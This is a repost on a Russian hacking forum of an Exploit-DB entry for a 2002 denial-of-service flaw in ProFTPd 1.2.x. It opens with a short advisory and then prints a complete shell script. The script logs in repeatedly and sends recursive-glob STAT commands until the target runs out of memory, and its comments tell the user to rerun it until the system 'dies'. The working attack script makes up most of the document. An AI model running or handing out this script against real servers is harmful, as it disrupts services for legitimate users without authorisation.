Exploit ProFTPd 1.2.x - 'STAT' Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22079
Проверка EDB
  1. Пройдено
Автор
ROB KLEIN GUNNEWIEK
Тип уязвимости
DOS
Платформа
LINUX
CVE
null
Дата публикации
2002-12-09
Код:
source: https://www.securityfocus.com/bid/6341/info

A denial of service vulnerability has been reported for ProFTPD. It is possible to cause ProFTPD from responding to legitimate requests for service by issuing specially crafted STAT commands. This will result in a denial of service condition.

#!/bin/sh
#
# proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
# might work against many other FTP daemons
# consumes nearly all memory and alot of CPU
#
# tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
#
# 7-dec-02 - detach  -  www.duho.org
#
# use: ./prodos.sh <host> <user> <pass>
# do this some more to make sure the system eventually dies

cnt=25
while [ $cnt -gt 0 ] ; do
ftp -n << EOF&
o $1
quote user $2
quote pass $3
quote stat /*/*/*/*/*/*/*
quit
EOF
let cnt=cnt-1
done
sleep 2
killall -9 ftp
echo DONE!

#end
 
Источник
www.exploit-db.com

Похожие темы